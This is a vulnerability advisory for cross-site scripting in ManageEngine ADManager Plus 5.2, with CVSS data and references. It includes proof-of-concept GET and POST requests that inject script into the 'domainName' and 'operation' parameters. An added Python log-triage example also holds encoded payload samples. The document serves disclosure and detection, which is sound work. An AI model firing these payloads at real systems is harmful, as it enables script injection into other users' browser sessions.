
ManageEngine ADManager Plus 5.2 Multiple XSS Vulnerabilities

2012-02-07 00:00:00
Gjoko Krstic
zeroscience.mk

CVSS2: 4.3
Attack Vector: NETWORK
Attack Complexity: MEDIUM
Authentication: NONE
Confidentiality Impact: NONE
Integrity Impact: PARTIAL
Availability Impact: NONE
AV:N/AC:M/Au:N/C:N/I:P/A:N

AI Score: 6.2
Confidence: High

EPSS: 0.005
Percentile: 76.0%

Title: ManageEngine ADManager Plus 5.2 Multiple XSS Vulnerabilities
Advisory ID: ZSL-2012-5070
Type: Local/Remote
Impact: Cross-Site Scripting
Risk: (3/5)
Release Date: 07.02.2012

Summary

ADManager Plus is a simple, easy-to-use Windows Active Directory Management and Reporting Solution that helps AD Administrators and Help Desk Technicians with their day-to-day activities.

Description

ADManager Plus suffers from multiple XSS vulnerabilities when parsing user input to the ‘domainName’ parameter in the ‘/jsp/AddDC.jsp’ script via GET method and ‘operation’ parameter in the ‘/DomainConfig.do’ script via POST method. Attackers can exploit these weaknesses to execute arbitrary HTML and script code in a user’s browser session.
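
For triage of proxy or application request logs, the following added example (not part of the original advisory or the vendor's code) flags requests to the two endpoints named above whose affected parameter decodes to a value containing quote or angle-bracket characters. The function names, the sample requests and the rule that legitimate values never contain those characters are assumptions made for illustration.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Endpoint -> parameter pairs named in the advisory.
WATCHED = {"/jsp/AddDC.jsp": "domainName", "/DomainConfig.do": "operation"}
# Assumption: legitimate values never need quote or angle-bracket characters.
MARKUP = re.compile(r"[<>\"']")


def fully_decode(value, rounds=3):
    """Undo repeated percent-encoding (bounded) so %253C is seen as '<'."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def flag_request(method, url, body=""):
    """Return decoded values of the watched parameter that carry markup."""
    parts = urlsplit(url)
    param = WATCHED.get(parts.path)
    if param is None:
        return []
    fields = parse_qs(parts.query, keep_blank_values=True)
    if method.upper() == "POST":  # form fields arrive in the request body
        for key, vals in parse_qs(body, keep_blank_values=True).items():
            fields.setdefault(key, []).extend(vals)
    decoded = (fully_decode(v) for v in fields.get(param, []))
    return [v for v in decoded if MARKUP.search(v)]


# Constructed sample requests (not captured traffic).
SAMPLES = [
    ("GET", "/jsp/AddDC.jsp?domainName=corp.example.com", ""),
    ("GET", "/jsp/AddDC.jsp?domainName=%22%3E%3Cscript%3Ealert('zsl')%3C/script%3E", ""),
    ("POST", "/DomainConfig.do?methodToCall=save",
     "DOMAIN_NAME=test&DOMAIN_CONTROLLER_NAME=testsrv&save=Add&operation=%2522%253Cb%253E&reset="),
    ("POST", "/DomainConfig.do?methodToCall=save", "DOMAIN_NAME=test&operation=add"),
]

if __name__ == "__main__":
    for method, url, body in SAMPLES:
        print(method, url, "->", flag_request(method, url, body) or "clean")
```

The POST case needs a log source that records request bodies; a standard access log only covers the GET case.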

Vendor

Zoho Corporation Pvt. Ltd. - <http://www.manageengine.com>

Affected Version

5.2 (Build 5210)

Tested On

Microsoft Windows XP Professional SP3 (EN)
Apache-Coyote/1.1

Vendor Status

[07.02.2012] Vendor has knowledge about the issue, developing patch.

PoC

admanager_xss.txt

Credits

Vulnerability discovered by Gjoko Krstic - <[email protected]>

References

[1] <http://secunia.com/advisories/47887/>
[2] <http://cxsecurity.com/issue/WLB-2012020063>
[3] <http://www.securityfocus.com/bid/51893>
[4] <http://packetstormsecurity.org/files/109528>
[5] <http://www.osvdb.org/show/osvdb/78901>
[6] <http://www.osvdb.org/show/osvdb/78902>
[7] <http://xforce.iss.net/xforce/xfdb/73039>
[8] <https://vulners.com/cve/CVE-2012-1049>

Changelog

[07.02.2012] - Initial release
[08.02.2012] - Added reference [4], [5] and [6]
[09.02.2012] - Added reference [7]
[17.02.2012] - Added reference [8]

Contact

Zero Science Lab

Web: <http://www.zeroscience.mk>
e-mail: [email protected]

ManageEngine ADManager Plus 5.2 Multiple XSS Vulnerabilities


Vendor: Zoho Corporation Pvt. Ltd.
Product web page: http://www.manageengine.com
Affected version: 5.2

Summary: ADManager Plus is a simple, easy-to-use Windows
Active Directory Management and Reporting Solution that
helps AD Administrators and Help Desk Technicians with
their day-to-day activities.

Desc: ADManager Plus suffers from multiple XSS vulnerabilities
when parsing user input to the 'domainName' parameter in the
'/jsp/AddDC.jsp' script via GET method and 'operation' parameter
in the '/DomainConfig.do' script via POST method. Attackers can
exploit these weaknesses to execute arbitrary HTML and script
code in a user's browser session.

Tested on: Microsoft Windows XP Professional SP3 (EN)
           Apache-Coyote/1.1


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2012-5070
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5070.php


06.02.2012

---

#1

 - GET http://localhost:8080/jsp/AddDC.jsp?domainName="><script>alert('zsl')</script> HTTP/1.1


#2

 - POST http://localhost:8080/DomainConfig.do?methodToCall=save HTTP/1.1

   - DOMAIN_NAME=test&DOMAIN_CONTROLLER_NAME=testsrv&save=Add&operation="><script>alert('zsl')</script>&reset=
